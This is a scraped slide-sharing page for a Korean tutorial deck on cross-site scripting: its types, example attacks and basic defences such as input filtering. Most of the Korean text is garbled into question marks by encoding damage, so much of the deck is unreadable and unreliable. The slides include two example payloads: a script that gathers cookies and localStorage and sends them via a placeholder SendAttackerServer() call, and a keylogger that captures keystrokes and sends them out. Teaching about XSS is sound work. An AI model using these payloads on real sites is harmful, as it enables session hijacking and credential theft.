ºÝºÝߣ

ºÝºÝߣShare a Scribd company logo

XSS ? ??? ????. [?? ??]

?Download as PPTX, PDF?
?
?? ?
?? ?

xss ? ?? ??? ?? ? ?????. ???? ????? ???????.

1 of 19
Downloaded 13 times
XSS?.araboza ??? ?? ??? Cross Site Scripting dydwls121200@gmail.com ??? XSS ???? ???. ???? ??? ???.
1. XSS? ?? 2. XSS? ?? 3. XSS? ?? ? ?? 4. ????
2. XSS? ?? XSS? ???-?
1. XSS? ?? ???? ????, ??? ??? ???? ?? ?? Cross-Site Scripting? ? ???????? ?? ???? ???? ??? ? ??? ???? ?? ?? ? ???? ?? ????? ?? ? ? ?? ???. (Wikipedia : ?????? ????? ??)
1. XSS? ??
??????? http://likemilk.fun25.co.kr:15405/ ?? script 1 console.log(document.cookie); console.log(document); console.log(localStorage); Var hijecking = {}; hijecking.cookie = document.cookie; hijecking.document = document; hijecking.localStorage = localStorage; //??? ??.. ?? ; SendAttackerServer(hijecking); ?? script 2 Var input=¡°¡±; $(document).on(¡®keyup¡¯,function(event){ input+=event.key; console.log(input); input=input.replace(¡®Backspace¡¯); //??¡­ }); //??? ?? ??; $(document).on(¡®click¡¯,function(event){ SendAttackerServer(input); }); 1. XSS? ??
2. XSS? ?? XSS ??? ?? ?????-!
Reflective XSS ???? ?? ??? ?? ??? URL? ? ?????? ??? ? ????? ??. Stored XSS ??? ???? ? ? ????? ?? ?? ????? ? ????? ?? ? ?? ?? ?? DOM XSS ??????? ? ??? ??? ?? ?? ??? ??? ????. 2. XSS? ??
Reflective XSS 2. XSS? ??
1. ??? ???? x?????? ?? ????? ?? Active X? ??? 2. ??? ???? ????? ????? ????? ? ????? ??? ???? ????? 3. ??? ???? ???? ? ?? URL?? ????? ???? ?? ??????. 4. ?? ??? ??? ??? ????? ?????. Reflective XSS ???? ?? ???? ? ??? URL? ??? ???? ???? ?? ??? ??. 2. XSS? ??
Stored XSS 2. XSS? ??
1. ???? ?? ????? ??? ?? ??? ?? ?? ?? ?? ???? ??? ?? ?? ????? ???? ??. 2. ??? ??????? ?? ???? event? ???? ????? ???? ??????? ???? ??. 3. XmlHttpOpen,$.ajax, $.get, $.post ??? EventEmitter? ???? ???? ???? ???? ?? ???? ?? ??? ? ??? ??. Stored XSS ??? ???? ? ? ????? ?? ?? ????? ? ????? ?? ? ?? ?? ?? 4. ???? ??? ?? ??? ? ???? ????? ? ????, ???? ???? ?? ??? ?? ????? ????? ??. 2. XSS? ??
DOM XSS 2. XSS? ??
DOM XSS ??????? ?? ?? ??? ??? ? ??? ??? ? ? ??. 1. ?????? ?? ? ?? ???? ?? ??? ??? ? ?? ? ?? ??? ?? ? ??? ? ??. ?: (??? ??:(????? ??????? ?? ?) 2. ???? ??????? ??? ?? ?? ????? ? ?? ????? ?? ??? ???? XSS ??? ?? ? ? ?? ?? ? ? ??? ????. 2. XSS? ??
3. XSS? ?? ??? ????-!
3. XSS? ?? https://namu.wiki/w/XSS http://egloos.zum.com/keep/v/1030642 HTML ???? ???
4. ???? ?????-?
4. ?? ?? Server-Side ?? XSS ??? ???? ?? ???? ? ?????? ???? ? SQL Injection ? XSS? ?? ??? ?????? ??????. ???? ? ?? ??? Client-Side? ?? ????? ????. [< > ¡° ¡® ; : ` ! @ # $ % & * | ( ) { } ] ?? ?? ???? ???? ? ???? ??.
Refernces http://gudgud92.tistory.com/31 http://best421.tistory.com/63 http://cleverdj.tistory.com/51 https://namu.wiki/w/XSS http://www.kisa.or.kr/uploadfile/201312/201312161355109566.pdf

More Related Content

XSS ? ??? ????. [?? ??]